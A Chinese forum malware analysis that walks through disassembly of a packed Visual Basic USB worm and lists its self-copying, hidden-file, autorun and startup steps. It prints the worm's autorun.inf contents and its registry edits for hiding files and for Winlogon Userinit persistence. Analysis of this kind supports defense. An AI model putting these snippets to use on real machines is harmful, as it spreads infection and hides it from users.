一个VB病毒的简单分析+模拟源码+专杀
noname剑人2009/05/08软件综合 IP:北京
一个VB病毒的简单分析+模拟源码+专杀

【文章作者】: NONAME剑人

--------------------------------------------------------------------------------

  发个牢骚,搞了半天VB,总算看明白一次……
  ================================================
  壳信息:UPX
  解壳:  略
  ================================================
  病毒结构:
  00401950  JMP UNPACKED.004029B0                         ; Main
  00401955  SUB DWORD PTR SS:[ESP+4],0FFFF
  0040195D  JMP UNPACKED.00404600                         ; get win dic
  00401962  SUB DWORD PTR SS:[ESP+4],0FFFF
  0040196A  JMP UNPACKED.00404720                         ; get sys dic
  0040196F  SUB DWORD PTR SS:[ESP+4],3F
  00401977  JMP UNPACKED.00404860                         ; 设置定时器
  0040197C  SUB DWORD PTR SS:[ESP+4],0FFFF
  00401984  JMP UNPACKED.004051C0                         ; hide
  00401989  SUB DWORD PTR SS:[ESP+4],0FFFF
  00401991  JMP UNPACKED.00405500                         ; 写入regedit。通过导入reg文件实现修改注册表,自启动  (这是VB的“调试模式”?)
  如上表,程序共分为五节,
  29B0 主程序
  4600 获取windows路径
  4720 获取system32路径
  4860 定时器回调,专做autoinf
  51C0 修改注册表实现隐藏文件
  5500 修改注册表实现自启动
  
  尽管动了动mswinsck.ocx,但很显然病毒作者没有搞过,水平显然停留在单机层面
  ================================================
  function 1:主程序
  进入ThurMain,下跟踪断点400000<=EIP<=500000,停在此处
  004029B0  PUSH EBP      //Return
  ①准备工作
  00402C52  CALL DWORD PTR DS:[EDX+700]                             ; sub 得到system32路径
  00402C58  MOV EDX,DWORD PTR SS:[EBP-2C]
  00402C5B  MOV ECX,DWORD PTR SS:[EBP+8]
  00402C5E  ADD ECX,34
  00402C61  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCopy>]             MSVBVM60.__vbaStrCopy
  00402C67  LEA ECX,DWORD PTR SS:[EBP-2C]                           ; [15F95C]==拷系统路径
  00402C6A  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeStr>]             MSVBVM60.__vbaFreeStr
  00402C70  MOV DWORD PTR SS:[EBP-4],8
  00402C77  LEA ECX,DWORD PTR SS:[EBP-2C]
  00402C7A  PUSH ECX
  00402C7B  MOV EDX,DWORD PTR SS:[EBP+8]
  00402C7E  MOV EAX,DWORD PTR DS:[EDX]
  00402C80  MOV ECX,DWORD PTR SS:[EBP+8]
  00402C83  PUSH ECX
  00402C84  CALL DWORD PTR DS:[EAX+6F8]                             ; sub 得到windows路径
  
  00402D92  CALL DWORD PTR DS:[EAX+58]                               sub 得到self exe名
  
  经过动态分析,程序分别调用了得到system32和得到windows路径的子程和自身路径、名称,以作准备
  
  ②分别动手
  
  00402E01  MOV DWORD PTR SS:[EBP-D0],UNPACKED.00402040             ; UNICODE "desktop"
  00402E0B  MOV DWORD PTR SS:[EBP-D8],8008
  00402E15  LEA EDX,DWORD PTR SS:[EBP-68]
  00402E18  PUSH EDX
  00402E19  LEA EAX,DWORD PTR SS:[EBP-D8]
  00402E1F  PUSH EAX
  00402E20  CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarTstEq>]           ; MSVBVM60.__vbaVarTstEq
  00402E26  MOV WORD PTR SS:[EBP-12C],AX                            
  
  比较自己的名是不是desktop
  
  00402E52  JE UNPACKED.00404205                                     如果不是的话就跳走
  
  ………………
  (这部分是文件名是desktop.exe时的程序,一会儿再说,记为 【一号】 )
  jmp over
  
  ………………
  00404322  CALL DWORD PTR DS:[<&MSVBVM60.rtcLowerCaseVar>]         ; MSVBVM60.rtcLowerCaseVar
  00404328  MOV DWORD PTR SS:[EBP-D0],UNPACKED.00402190             ; UNICODE "svchost"
  00404332  MOV DWORD PTR SS:[EBP-D8],8008
  0040433C  LEA ECX,DWORD PTR SS:[EBP-68]
  0040433F  PUSH ECX
  00404340  LEA EDX,DWORD PTR SS:[EBP-D8]
  00404346  PUSH EDX
  00404347  CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarTstEq>]           ; MSVBVM60.__vbaVarTstEq
  0040434D  MOV WORD PTR SS:[EBP-12C],AX                            
  这部分比较selfname是不是svchost
  
  00404379  JE UNPACKED.0040454D                                     不是的话跳走
  ………………
  (这部分是文件名是svchost.exe时的程序,一会儿再说,记为 【二号】 )
  
  ………………
  
  设置定时器(FORM_LOAD结束……)
  
  
  ③一号部分(既如果是desktop.exe时)
  
  00402E68  CALL DWORD PTR DS:[EDX+708]                             ;
  调用function 4
  改变文件夹选项-隐藏
  
  00402E6E  MOV DWORD PTR SS:[EBP-4],0B
  00402E75  CALL DWORD PTR DS:[<&MSVBVM60.rtcDoEvents>]             ; MSVBVM60.rtcDoEvents
  00402E7B  MOV DWORD PTR SS:[EBP-4],0C                             ; 缓解一下内存紧张
  00402E82  PUSH UNPACKED.00402054
  00402E87  LEA ECX,DWORD PTR SS:[EBP-2C]
  00402E8A  PUSH ECX
  00402E8B  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrToAnsi>]           MSVBVM60.__vbaStrToAnsi
  
  00402E91  PUSH EAX
  00402E92  PUSH 0
  00402E94  CALL UNPACKED.00401F58                                  
  00402E99  MOV DWORD PTR SS:[EBP-110],EAX
                                                                     用FindWindow查找“我的电脑”
  00402EBE  PUSH 0
  00402EC0  PUSH 0
  00402EC2  PUSH 10
  00402EC4  MOV EAX,DWORD PTR SS:[EBP-24]
  00402EC7  PUSH EAX
  00402EC8  CALL UNPACKED.00401FC0
  00402ECD  MOV DWORD PTR SS:[EBP-110],EAX
                                                                     向“我的电脑”发送wm_close
  
  00402FDE  PUSH UNPACKED.00402064                                   UNICODE "\explorer.exe /n,"
  00402FE3  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]             ; MSVBVM60.__vbaStrCat
  00402FE9  MOV EDX,EAX                                             ;
                                               连接字符串->"c:\windows\explorer.exe /n,自己的路径"
  0040300F  CALL DWORD PTR DS:[<&MSVBVM60.rtcShell>]                 MSVBVM60.rtcShell 运行
  
  运行c:\windows\explorer.exe /n,自己的路径
  
  00403064  PUSH EAX                                                 建立c:\windows\system32\scvhost文件夹
  00403065  CALL DWORD PTR DS:[<&MSVBVM60.rtcMakeDir>]               MSVBVM60.rtcMakeDir
  
  
  
  0040342D  PUSH UNPACKED.004020C4                                   UNICODE "\scvhost\svchost.exe"
  00403432  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]             ; MSVBVM60.__vbaStrCat
  00403438  MOV EDX,EAX                                             ; 连接字符串 "c:\windows\system32\scvhost\svchost.exe"
  00403491  PUSH EAX
  00403492  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCopy>]             ; MSVBVM60.rtcFileCopy
  00403498  LEA EAX,DWORD PTR SS:[EBP-3C]                           ;
  
  
                                                    把自己拷到"c:\windows\system32\scvhost\svchost.exe"
  
  
  
  00403517  PUSH UNPACKED.004020C4                                   UNICODE "\scvhost\svchost.exe"
  0040351C  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]             ; MSVBVM60.__vbaStrCat
  00403522  MOV EDX,EAX
  00403524  LEA ECX,DWORD PTR SS:[EBP-2C]
  00403527  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]             MSVBVM60.__vbaStrMove
  0040352D  PUSH EAX
  0040352E  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]           MSVBVM60.rtcSetFileAttr
  00403534  LEA ECX,DWORD PTR SS:[EBP-2C]                           ; 设置病毒体属性-->系统+隐藏
  
  
  
  00403561  PUSH EAX
  00403562  PUSH 1
  00403564  PUSH -1
  00403566  PUSH 2                                                  
  00403568  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFileOpen>]           ; MSVBVM60.__vbaFileOpen
  
  open "c:\windows\system32\XXXXXXXXXXi" for output as #2(原因是function 4占用#1号文件)
  
  
  0040369F  PUSH EDX
  004036A0  PUSH 1
  004036A2  PUSH UNPACKED.00402114
  004036A7  CALL DWORD PTR DS:[<&MSVBVM60.__vbaWriteFile>]           写文件("E")
  
  写自身盘符到#2号文件中
  
  
  004036D5  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFileClose>]           MSVBVM60.__vbaFileClose
  004036DB  MOV DWORD PTR SS:[EBP-4],15                             ; 关闭文件
  
  
  
  0040398D  PUSH UNPACKED.00402138                                   UNICODE "\MSWINSCK.OCX"
  00403992  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]             ; MSVBVM60.__vbaStrCat
  00403998  MOV EDX,EAX
  0040399A  LEA ECX,DWORD PTR SS:[EBP-38]
  0040399D  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]             MSVBVM60.__vbaStrMove
  004039A3  PUSH EAX                                                 合并字符串 c:\windows\system32\mswinsck.ocx
  
  004039DC  PUSH EAX
  004039DD  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCopy>]             ; MSVBVM60.rtcFileCopy
  004039E3  LEA ECX,DWORD PTR SS:[EBP-38]                           ; 把mswinsck.ocx拷到自身目录……
  
  
  00403A67  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]           MSVBVM60.rtcSetFileAttr
  00403A6D  LEA ECX,DWORD PTR SS:[EBP-2C]
  00403A70  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeStr>]             MSVBVM60.__vbaFreeStr
  00403A76  MOV DWORD PTR SS:[EBP-4],18                             ;
  用SetFileAttr检查拷没拷上
  …………(以下和上面雷同,略写)
  00403D6B  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCopy>]             ; MSVBVM60.rtcFileCopy
  00403D71  LEA ECX,DWORD PTR SS:[EBP-38]                           ; 把自己再拷成“c:\windows\system32\usb2.exe”
  
  00403DF5  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]           MSVBVM60.rtcSetFileAttr
  00403DFB  LEA ECX,DWORD PTR SS:[EBP-2C]                           ; 设置系统隐藏
  004040B4  MOV EDX,EAX                                             ; 把自己再拷成“c:\windows\system32\wuauserv.exe”
  00404182  PUSH EAX                                                 设置系统隐藏
  00404183  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]           MSVBVM60.rtcSetFileAttr
  
  
  004041AF  CALL DWORD PTR DS:[ECX+70C]                             ;
  实现自启动(调用function 5)
  
  
  004041C3  PUSH UNPACKED.004020C4                                   UNICODE "\scvhost\svchost.exe"
  004041C8  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]             ; MSVBVM60.__vbaStrCat
  004041CE  MOV DWORD PTR SS:[EBP-50],EAX
  004041D1  MOV DWORD PTR SS:[EBP-58],8
  004041D8  PUSH 2
  004041DA  LEA EDX,DWORD PTR SS:[EBP-58]
  004041DD  PUSH EDX
  004041DE  CALL DWORD PTR DS:[<&MSVBVM60.rtcShell>]                 MSVBVM60.rtcShell
  004041E4  FSTP QWORD PTR SS:[EBP-118]                             ; 运行svchost.exe(病毒),请看下面分解
  
  
  ④二号部分(既如果是svchost.exe时)
  
  0040438C  PUSH ECX
  0040438D  PUSH UNPACKED.004020F4                   ; UNICODE "\XXXXXXXXXXi"
  00404392  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
  00404398  MOV EDX,EAX
  0040439A  LEA ECX,DWORD PTR SS:[EBP-2C]             合并字符串
  
  0040439D  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
  004043A3  PUSH EAX
  004043A4  PUSH 1
  004043A6  PUSH -1
  004043A8  PUSH 1
  004043AA  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFileO>; MSVBVM60.__vbaFileOpen
  
  open "c:\windows\system32\XXXXXXXXXXi" for input as #1
  搞不懂前面还#2,这回粗心变#1?
  
  004043B0  LEA ECX,DWORD PTR SS:[EBP-2C]
  004043B3  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeS>; MSVBVM60.__vbaFreeStr
  004043B9  MOV DWORD PTR SS:[EBP-4],22
  004043C0  MOV EDX,DWORD PTR SS:[EBP+8]
  004043C3  ADD EDX,3C
  004043C6  PUSH EDX
  004043C7  PUSH 1
  004043C9  PUSH UNPACKED.004021A4
  004043CE  CALL DWORD PTR DS:[<&MSVBVM60.__vbaInput>; MSVBVM60.__vbaInputFile
  004043D4  ADD ESP,0C                               ; 读入盘符
  
  
  004043F4  PUSH UNPACKED.004021AC                   ; UNICODE ":\"
  004043F9  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
  004043FF  MOV EDX,EAX
  00404401  LEA ECX,DWORD PTR SS:[EBP-2C]
  00404404  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
  0040440A  MOV EDX,EAX                               连接字符 盘符+":\"
  
  004044B3  CALL DWORD PTR DS:[EAX+708]               sub 隐藏
  
  调用function 4,隐藏文件
  
  004044C7  PUSH UNPACKED.00402170                   ; UNICODE "\wuauserv.exe"
  004044CC  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
  004044D2  MOV EDX,EAX
  004044D4  LEA ECX,DWORD PTR SS:[EBP-30]
  004044D7  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
  004044DD  PUSH EAX
  004044DE  MOV ECX,DWORD PTR SS:[EBP+8]
  004044E1  MOV EDX,DWORD PTR DS:[ECX+34]
  004044E4  PUSH EDX
  004044E5  PUSH UNPACKED.00402158                   ; UNICODE "\USB2.exe"
  004044EA  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
  004044F0  MOV EDX,EAX
  004044F2  LEA ECX,DWORD PTR SS:[EBP-2C]
  004044F5  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
  004044FB  PUSH EAX
  004044FC  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCop>; MSVBVM60.rtcFileCopy
  00404502  LEA EAX,DWORD PTR SS:[EBP-30]             copy usb2.exe wuauserv.exe
  
  (到现在为止还搞不明白usb2.exe和wuauserv.exe有什么用,纯粹是鸡肋,如果我没理解错的话)
  
  
  00404524  PUSH EAX
  00404525  PUSH UNPACKED.00402170                   ; UNICODE "\wuauserv.exe"
  0040452A  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCa>; MSVBVM60.__vbaStrCat
  00404530  MOV EDX,EAX
  00404532  LEA ECX,DWORD PTR SS:[EBP-2C]
  00404535  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMo>; MSVBVM60.__vbaStrMove
  0040453B  PUSH EAX
  0040453C  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFile>; MSVBVM60.rtcSetFileAttr
  
  设置系统隐藏
  
  到目前为止,function 1 就算分析完了,我们来看一下病毒道理干了什么
  
  1 得到系统(windows)路径
  2 得到系统(system32)路径
  3 得到自身路径及文件名
  4 判断运行文件名
  5 如果不是desktop.exe的话,跳到第15步
  6 调用function 4,向"我的电脑"发wm_close
  7 运行 c:\windows\explorer.exe /n,自己的路径
  8 建立c:\windows\system32\scvhost文件夹
  9 把自己拷到c:\windows\system32\scvhost\svchost.exe,并设置系统隐藏
  10 把病毒本体位置盘符写到 c:\windows\system32\XXXXXXXXXXi中
  11 把mswinsck.ocx拷到自身目录,隐藏
  12 把自身拷到c:\windows\system32\usb2.exe,隐藏
  13 把自身拷到c:\windows\system32\wuauserv.exe,隐藏
  14 实现自启动(function 5),运行c:\windows\system32\scvhost\svchost.exe
  
  15 判断运行文件名
  16 如果不是svchost.exe的话,跳到第20步
  17 读入文件,获得盘符
  18 调用function 4,隐藏文件
  19 copy usb2.exe wuauserv.exe,并隐藏
  20 设置定时器(function 3)
  ================================================
  function 2:获取windows路径
  00404669  CALL DWORD PTR DS:[<&MSVBVM60.rtcSpaceBstr>]           创建大字符串
  0040466F  MOV EDX,EAX
  00404671  LEA ECX,DWORD PTR SS:[EBP-24]
  
  0040468D  PUSH EDX
  0040468E  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrToAnsi>]         MSVBVM60.__vbaStrToAnsi
  00404694  PUSH EAX
  00404695  CALL UNPACKED.00401DC4
  0040469A  MOV DWORD PTR SS:[EBP-30],EAX                         ;
  得到系统路径(主要是404695那句起的作用)
  
  004046AB  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrToUnicode>]     ; MSVBVM60.__vbaStrToUnicode
  004046B1  MOV EDX,DWORD PTR SS:[EBP-30]                         ; 系统路径-->unicode
  ================================================
  function 3 获取system32路径(基本与上同,略)
  ================================================
  function 4 定时器
  根据观察,定时器大约6s运行一次
  
  004048D9  LEA ECX,DWORD PTR SS:[EBP-28]
  004048DC  PUSH ECX
  004048DD  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrToAnsi>]         MSVBVM60.__vbaStrToAnsi
  004048E3  PUSH EAX
  004048E4  CALL UNPACKED.00401EB0                                 getdrivetype
  004048E9  MOV DWORD PTR SS:[EBP-108],EAX                         [ebp-108]=e盘类型
  
  根据之前input文件的信息,得到盘符,并得到该盘类型
  
  004048E9  MOV DWORD PTR SS:[EBP-108],EAX                         [ebp-108]=e盘类型
  00404906  MOV ECX,DWORD PTR SS:[EBP-108]
  0040490C  MOV DWORD PTR SS:[EBP-24],ECX
  传递变量
  0040491F  CMP DWORD PTR SS:[EBP-24],1
  
  0040491F  CMP DWORD PTR SS:[EBP-24],1
  00404923  JE UNPACKED.00405105                                   如果不是Not exist,就干坏事
  
  00404952  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrToAnsi>]         MSVBVM60.__vbaStrToAnsi
  00404958  PUSH EAX                                               连接字符串 盘符+":\desktop.exe"
  00404959  CALL UNPACKED.00401F08                                 GetFileAttributes
  0040495E  MOV DWORD PTR SS:[EBP-108],EAX
  
  00404992  MOVSX EDX,WORD PTR SS:[EBP-10C]
  00404999  TEST EDX,EDX
  0040499B  JE UNPACKED.00405105                                   如果有这个文件就走
  利用GetFileAttributes做判断是否存在文件
  
  00404D6A  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00404D70  PUSH EAX                                               连接字符串 :e:\desktop.exe
  
  00404DBE  PUSH EAX
  00404DBF  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCopy>]           ; MSVBVM60.rtcFileCopy
  00404DC5  LEA EDX,DWORD PTR SS:[EBP-38]                         ; 拷贝自身到e:\desktop.exe
  
  00404E44  PUSH UNPACKED.004021C8                                 UNICODE "desktop.exe"
  00404E49  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00404E4F  MOV EDX,EAX
  00404E51  LEA ECX,DWORD PTR SS:[EBP-28]
  00404E54  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00404E5A  PUSH EAX
  00404E5B  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  00404E61  LEA ECX,DWORD PTR SS:[EBP-28]                         ; 隐藏desktop.exe
  
  00404E91  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  00404E97  LEA ECX,DWORD PTR SS:[EBP-28]                         ; 设置XXXXXXXXXXf隐藏+系统(判断有没有文件)
  
  00404EAE  PUSH UNPACKED.004021E4                                 UNICODE "XXXXXXXXXXf"
  00404EB3  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00404EB9  MOV DWORD PTR SS:[EBP-4C],EAX
  00404EBC  MOV DWORD PTR SS:[EBP-54],8
  00404EC3  LEA EDX,DWORD PTR SS:[EBP-54]
  00404EC6  PUSH EDX
  00404EC7  CALL DWORD PTR DS:[<&MSVBVM60.rtcKillFiles>]           MSVBVM60.rtcKillFiles
  00404ECD  LEA ECX,DWORD PTR SS:[EBP-54]                         ; 干掉XXXXXXXXXXf(害怕被别的病毒占用)
  
  00404EE4  PUSH UNPACKED.004021E4                                 UNICODE "XXXXXXXXXXf"
  00404EE9  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00404EEF  MOV EDX,EAX
  00404EF1  LEA ECX,DWORD PTR SS:[EBP-28]
  00404EF4  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00404EFA  PUSH EAX
  00404EFB  PUSH 1
  00404EFD  PUSH -1                                               ; 新建XXXXXXXXXXf,写文件
  
  ………………
  写的东西如下,不再在文中累赘:
  [AutoRun]
  shell=verb1
  shell\verb1\command=desktop.exe
  shell\verb1=打开(&O)
  shell=Auto
  
  00404FBB  PUSH UNPACKED.004021E4                                 UNICODE "XXXXXXXXXXf"
  00404FC0  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00404FC6  MOV EDX,EAX
  00404FC8  LEA ECX,DWORD PTR SS:[EBP-28]
  00404FCB  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00404FD1  PUSH EAX
  00404FD2  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  00404FD8  LEA ECX,DWORD PTR SS:[EBP-28]                         ; 设置系统+隐藏
  
  00404FEE  PUSH EDX
  00404FEF  PUSH UNPACKED.0040211C                                 UNICODE "folder.exe"
  00404FF4  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00404FFA  MOV EDX,EAX
  00404FFC  LEA ECX,DWORD PTR SS:[EBP-2C]
  00404FFF  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00405005  PUSH EAX
  00405006  MOV EAX,DWORD PTR SS:[EBP+8]
  00405009  MOV ECX,DWORD PTR DS:[EAX+34]
  0040500C  PUSH ECX
  0040500D  PUSH UNPACKED.00402138                                 UNICODE "\MSWINSCK.OCX"
  00405012  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00405018  MOV EDX,EAX
  0040501A  LEA ECX,DWORD PTR SS:[EBP-28]
  0040501D  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00405023  PUSH EAX
  00405024  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCopy>]           ; MSVBVM60.rtcFileCopy
  0040502A  LEA EDX,DWORD PTR SS:[EBP-2C]                         ; 把c:\windows\system32\mswinsck.ocx拷成e:\folder.exe
  
  0040504C  PUSH EDX
  0040504D  PUSH UNPACKED.0040211C                                 UNICODE "folder.exe"
  00405052  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00405058  MOV EDX,EAX
  0040505A  LEA ECX,DWORD PTR SS:[EBP-28]
  0040505D  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00405063  PUSH EAX
  00405064  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  0040506A  LEA ECX,DWORD PTR SS:[EBP-28]                         ; 给folder.exe设置隐藏系统
  0040506D  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeStr>]           MSVBVM60.__vbaFreeStr
  
  00405080  PUSH ECX
  00405081  PUSH UNPACKED.00401F8C                                 UNICODE "desktop2.exe"
  00405086  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  0040508C  MOV EDX,EAX
  0040508E  LEA ECX,DWORD PTR SS:[EBP-2C]
  00405091  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  00405097  PUSH EAX
  00405098  MOV EDX,DWORD PTR SS:[EBP+8]
  0040509B  MOV EAX,DWORD PTR DS:[EDX+34]
  0040509E  PUSH EAX
  0040509F  PUSH UNPACKED.00402170                                 UNICODE "\wuauserv.exe"
  004050A4  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  004050AA  MOV EDX,EAX
  004050AC  LEA ECX,DWORD PTR SS:[EBP-28]
  004050AF  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  004050B5  PUSH EAX                                               把c:\windows\system32\wuauserv.exe拷成e:\desktop2.exe
  004050B6  CALL DWORD PTR DS:[<&MSVBVM60.rtcFileCopy>]           ; MSVBVM60.rtcFileCopy
  
  004050DB  MOV ECX,DWORD PTR DS:[EAX+3C]
  004050DE  PUSH ECX
  004050DF  PUSH UNPACKED.00401F8C                                 UNICODE "desktop2.exe"
  004050E4  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  004050EA  MOV EDX,EAX                                           ; 隐藏,系统
  004050EC  LEA ECX,DWORD PTR SS:[EBP-28]
  004050EF  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  004050F5  PUSH EAX
  004050F6  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  
  再分析一下定时器的内容:
  1 看看盘符是否可写
  2 看看有没有desktop2.exe
  3 copy 自己到 (e):\desktop2.exe
  4 判断是否有XXXXXXXXXXf
  5 杀掉XXXXXXXXXXf
  6 建立自己XXXXXXXXXXf,设置系统隐藏
  7 把c:\windows\system32\mswinsck.ocx拷成e:\folder.exe
  8 e:\folder.exe 隐藏系统  ================================================
  function 5:修改注册表实现隐藏文件
  
  00405224  PUSH UNPACKED.004022C8                                 UNICODE "\XXXXXXXXXXXg"
  00405229  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  0040522F  MOV EDX,EAX                                           ; 字符连接->系统sys32目录+"XXXXXXXXXXXg"
  00405231  LEA ECX,DWORD PTR SS:[EBP-24]
  00405234  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  0040523A  PUSH EAX
  0040523B  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  00405241  LEA ECX,DWORD PTR SS:[EBP-24]                         ; 利用api检测是否存在XXXXXXXXXXXg
  00405244  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeStr>]           MSVBVM60.__vbaFreeStr
  0040524A  MOV DWORD PTR SS:[EBP-4],4                            
  
  00405271  CALL DWORD PTR DS:[<&MSVBVM60.rtcKillFiles>]           MSVBVM60.rtcKillFiles
  00405277  LEA ECX,DWORD PTR SS:[EBP-34]                         ; 杀掉原boothide(anti-virus?)
  
  
  0040529E  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrMove>]           MSVBVM60.__vbaStrMove
  004052A4  PUSH EAX
  004052A5  PUSH 1
  004052A7  PUSH -1
  004052A9  PUSH 2
  004052AB  CALL DWORD PTR DS:[<&MSVBVM60.__vbaFileOpen>]         ; MSVBVM60.__vbaFileOpen
  004052B1  LEA ECX,DWORD PTR SS:[EBP-24]                         ; "open XXXXXXXXXXXg for output as #1"
  
  004052CD  CALL DWORD PTR DS:[<&MSVBVM60.__vbaPrintFile>]         MSVBVM60.__vbaPrintFile
  004052D3  ADD ESP,0C                                             以下是写文件,不再累赘
  
  写的是这些:
  REGEDIT4
  
  [HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL]
  "CheckedValue"=dword:0
  
  [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
  "Hidden"=dword:2
  
  [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
  "SuperHidden"=dword:1
  
  [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
  "ShowSuperHidden"=dword:0
  =====================================
  0040545A  PUSH UNPACKED.004022C8                                 UNICODE "\XXXXXXXXXXXg"
  0040545F  CALL DWORD PTR DS:[<&MSVBVM60.__vbaStrCat>]           ; MSVBVM60.__vbaStrCat
  00405465  MOV DWORD PTR SS:[EBP-2C],EAX                         ; 连接字符串, regedit.exe /s c:\windows\system32\XXXXXXXXXXXg
  00405468  MOV DWORD PTR SS:[EBP-34],8
  0040546F  PUSH 0
  00405471  LEA EAX,DWORD PTR SS:[EBP-34]
  00405474  PUSH EAX
  00405475  CALL DWORD PTR DS:[<&MSVBVM60.rtcShell>]               MSVBVM60.rtcShell
  0040547B  FSTP QWORD PTR SS:[EBP-4C]                             导入刚才创建的reg
  
  004054B7  CALL DWORD PTR DS:[<&MSVBVM60.rtcSetFileAttr>]         MSVBVM60.rtcSetFileAttr
  004054BD  LEA ECX,DWORD PTR SS:[EBP-24]                         ; 设置属性->系统+隐藏
  
  =====================================
  function 6 修改注册表实现自启动
  
  和上面类似,就是写入
  REGEDIT4
  
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
  "Userinit"="userinit.exe,C:\\WINDOWS\\system32\\scvhost\\svchost.exe,wuauserv.exe"
  再导入
  ================================================
  ================================================
  ================================================
  ================================================
  ================================================
